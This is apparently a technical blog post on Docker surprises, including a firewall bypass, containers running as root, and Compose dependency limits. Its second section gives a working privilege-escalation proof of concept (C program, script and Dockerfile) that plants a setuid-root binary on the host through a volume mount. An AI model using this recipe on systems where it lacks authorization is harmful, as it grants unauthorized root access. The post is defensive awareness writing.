Docker In 2020: Strange Surprises And Unexpected Gotchas

The ability to isolate a given program along with its dependencies has long held the promise of better separation of concerns, fewer conflicts, and improved security and deployments.

Docker in particular, with its large ecosystem and ease of use, makes prototyping extremely easy. In fact, you'd be hard-pressed to find a technical post on this site that doesn't also include docker instructions for readers to try the examples for themselves.

That said, despite years of use and improvement, there are still surprises and unexpected gotchas that can easily catch people off guard.

1. Docker Bypasses UFW Firewall Rules

Out of the box, if you run docker containers on a system protected by the ufw firewall (Ubuntu, Debian, etc.), any ports published by a container will bypass the host's ufw rules. This was noticed at least as far back as 2017 and is still a problem in 2020.

As a practical example, say you have ufw configured to block all incoming traffic except SSH. If you then start up a test mysql container and include the -p option so that you can connect to it afterwards, i.e.:

docker run --name mysql1 -e MYSQL_ROOT_PASSWORD=password -p 3306:3306 -d mysql:latest

Congrats, your new, insecure mysql container is now available to everyone on the network who wants to connect to it, bypassing your otherwise strict ufw rules.

There are workarounds that approach the issue from different angles, from explicitly publishing ports to localhost to preventing dockerd from manipulating iptables entirely, but this remains one of the most concerning default behaviors, as it can silently expose unprotected services to remote abuse.
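For example, binding the published port to localhost keeps it reachable only from the host itself, while the daemon-wide iptables setting stops dockerd from editing firewall rules altogether. A quick sketch of both (the tee command below assumes /etc/docker/daemon.json doesn't already exist, and disabling iptables management means taking over NAT for all containers yourself):

# publish on the loopback interface only; unreachable from other hosts
$ docker run --name mysql1 -e MYSQL_ROOT_PASSWORD=password \
    -p 127.0.0.1:3306:3306 -d mysql:latest

# or stop dockerd from touching iptables entirely
$ echo '{ "iptables": false }' | sudo tee /etc/docker/daemon.json
$ sudo systemctl restart docker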

2. Leaky Permission Boundaries

If you've given a user the ability to run docker containers on a host, you've given them the ability to become root on that host. This is due to dockerd's default mapping of userids between the container and host. Below is a small proof-of-concept:

become_root.c
-------------

   #include <stdlib.h>    /* system() */
   #include <unistd.h>    /* setuid() */

   int main(){
     setuid(0);                   /* attempt to switch to root (uid 0) */
     system("/usr/bin/whoami");   /* print the resulting effective user */
     return 0;
   }

$ gcc become_root.c -o become_root

$ ./become_root
   ben

prepare.sh
----------
   #!/bin/sh
   # copy the program onto the mounted host volume and mark it setuid root
   cp /become_root /opt/become_root_setuid
   chmod 4755 /opt/become_root_setuid

Dockerfile
----------
   FROM busybox
   COPY prepare.sh  become_root /
   CMD ["/prepare.sh"]

$ docker build --tag setuid .
$ docker run --rm --name test1 --volume "$PWD":/opt setuid

$ ls -l become_root*
   -rw-r--r-- 1 ben  ben    115 Aug 31 22:52 become_root.c       <--- source code
   -rwxr-xr-x 1 ben  ben  16664 Sep  1 09:18 become_root         <--- original program
   -rwsr-xr-x 1 root root 16664 Sep  1 09:33 become_root_setuid  <--- program copy with setuid root

$ ./become_root_setuid
   root

Above, the become_root program attempts to setuid to 0 (root) and then runs `whoami` to display the effective userid. Running it locally does not grant root access since the file is owned by user 'ben' (the setuid bit is also not set, but this is irrelevant since setuid runs the program as the file owner, i.e. 'ben').

To get around this, the program and a small script were added to a minimal docker image that copies the become_root program to a shared volume specified at runtime and sets the setuid bit. Since dockerd (by default) mirrors userids between the container and the host for volume I/O, the file is written as root and now has the setuid bit set. This sequence effectively allows any user with permission to run docker containers to also create arbitrary programs that will run as root on the host system.

There are efforts to address this, such as Rootless mode; however, even setting aside its current experimental status, it must be explicitly configured and introduces limitations that may not be workable in your environment.
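For reference, here is a rough sketch of what enabling rootless mode looked like at the time of writing, based on the upstream instructions (the uid 1000 in the socket path is illustrative, and the exact steps may differ for your distribution):

$ curl -fsSL https://get.docker.com/rootless | sh
$ export PATH=$HOME/bin:$PATH
$ export DOCKER_HOST=unix:///run/user/1000/docker.sock
$ systemctl --user start docker

Even once it's running, limitations remain: binding privileged ports (below 1024), for instance, requires extra host configuration.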

3. Dockerized Applications Run As Root

Minimizing the number of processes running as root has been accepted best practice for a very, very long time. The general idea is that even if a process is successfully compromised, its "blast radius" is confined to the resources it has access to.

However, unless a Dockerfile explicitly switches to a different user, dockerized applications will run as root. The American Express team has a good write-up worth reading if you're unfamiliar with the risk this introduces, even when running applications in a containerized environment.
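Fortunately, dropping privileges is usually only a couple of Dockerfile lines: create an unprivileged account in the image and switch to it with the USER directive. A minimal sketch (the 'app' account name is arbitrary, and adduser flags vary between base images):

Dockerfile
----------
   FROM busybox
   # create an unprivileged account (-D: no password)
   RUN adduser -D app
   # everything from this point on runs as 'app'
   USER app
   # prints 'app' rather than 'root'
   CMD ["whoami"]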

4. Programs Consisting of Multiple Processes

Docker excels when working with a single process; however, as noted in the official FAQ, dockerizing programs that consist of multiple processes, though possible, isn't really the best fit for how docker is designed to work.
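The workaround the FAQ itself points to is a process manager such as supervisord, roughly along these lines (the package name and config path below are Debian-flavored assumptions):

Dockerfile
----------
   FROM debian:buster-slim
   RUN apt-get update && apt-get install -y supervisor
   COPY supervisord.conf /etc/supervisor/conf.d/supervisord.conf
   # -n keeps supervisord in the foreground as the container's main process
   CMD ["/usr/bin/supervisord", "-n"]

Of course, at that point you are re-introducing a small init system inside the container, which is precisely the mismatch the FAQ describes.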

Postfix is a good example where separation of specific-purpose processes has been central to its operation and security model. (It should be noted that there have been recent changes to ease Postfix's use in container environments, but even with these changes there are still additional aspects to consider).

5. Docker Compose YAML V2 vs V3

It's almost inevitable that you will run across a mix of V2 and V3 docker-compose.yml examples in the wild and wonder what the difference is and which version you should be using.

There is a brief history and overview written in this PR as well as in the official documentation, but the TL;DR is that the V3 format made structural and directive changes mainly to support running in Docker Swarm, most of which don't apply to the most common docker use-cases. As of this writing you can still use either compose format without issue; however, I will note that Docker (the company) recommends V3.
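As a concrete example of the structural changes involved, per-container resource limits sit directly on the service in V2 but moved under the Swarm-oriented deploy key in V3, which plain docker-compose ignores unless run with --compatibility (the services below are illustrative):

docker-compose.yml (V2)
-----------------------
   version: "2.4"
   services:
     web:
       image: nginx
       mem_limit: 512m

docker-compose.yml (V3)
-----------------------
   version: "3.8"
   services:
     web:
       image: nginx
       deploy:
         resources:
           limits:
             memory: 512m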

6. Limitations Of Dependency Support In Docker Compose

Another surprise when working with docker-compose comes when trying to establish container dependencies. For example, you wouldn't want your webapp container to start until the backend container it relies on is up and ready to receive connections. Since docker-compose's primary purpose is to define related groups of containers, there is a "depends_on" directive that allows you to define such relationships, but its actual operation leaves much to be desired.

"depends_on" does indeed take dependencies into consideration when starting containers up and shutting them down. However docker-compose only checks if a container's process has started before launching dependent containers, not if it has begun listening on a port or is in any other kind of "ready" state. This results in firing up each container immediately after each other, providing very little dependency-aware value.

The official documentation tries to justify this limitation, but frankly it comes off as a bit of a cop-out. Yes, determining a "ready" state may differ from one application to the next, but a handful of established methods would cover the vast majority of use-cases.

Instead, end-users are forced to rely on ugly hacks to work around this limitation. You can see one such workaround in my RabbitMQ HA post's docker-compose.yml, where an additional sleep interval was required to avoid a race condition when the RabbitMQ brokers start up. Alternatively, there are numerous "wait-for..." scripts and docker images of varying quality that aim to provide the functionality missing from the core program.
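Most of these boil down to the same idea: poll the dependency from an entrypoint script before handing off to the real command. A rough sketch (the 'backend' hostname, port, and script name are placeholders, and it assumes an image whose nc supports -z):

wait-for-backend.sh
-------------------
   #!/bin/sh
   # poll until the backend accepts TCP connections,
   # then exec this container's real command
   until nc -z backend 3306; do
     echo "waiting for backend..."
     sleep 1
   done
   exec "$@"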

It looks like there was some work done in the past to integrate health checks with depends_on; however, since V3 no longer supports the conditional form of depends_on, this doesn't appear to be a viable option going forward.
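For completeness, this is roughly what the healthcheck-aware form looks like under the 2.x formats; the same condition key causes a V3 file to be rejected (the mysqladmin ping test is just one common readiness probe):

docker-compose.yml
------------------
   version: "2.4"
   services:
     backend:
       image: mysql:latest
       environment:
         MYSQL_ROOT_PASSWORD: password
       healthcheck:
         test: ["CMD", "mysqladmin", "ping", "-h", "127.0.0.1"]
         interval: 5s
         retries: 10
     webapp:
       build: .
       depends_on:
         backend:
           # accepted by the 2.1+ formats, rejected by V3
           condition: service_healthy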

Final Thoughts

As the containerization landscape continues to mature I look forward to improvements both in shipped defaults and in people's awareness of risks and trade-offs involved with different configurations.

Hopefully this post brought to light something that you weren't aware of before and can help better prepare you for improved container management in the future. As always, good luck and happy coding!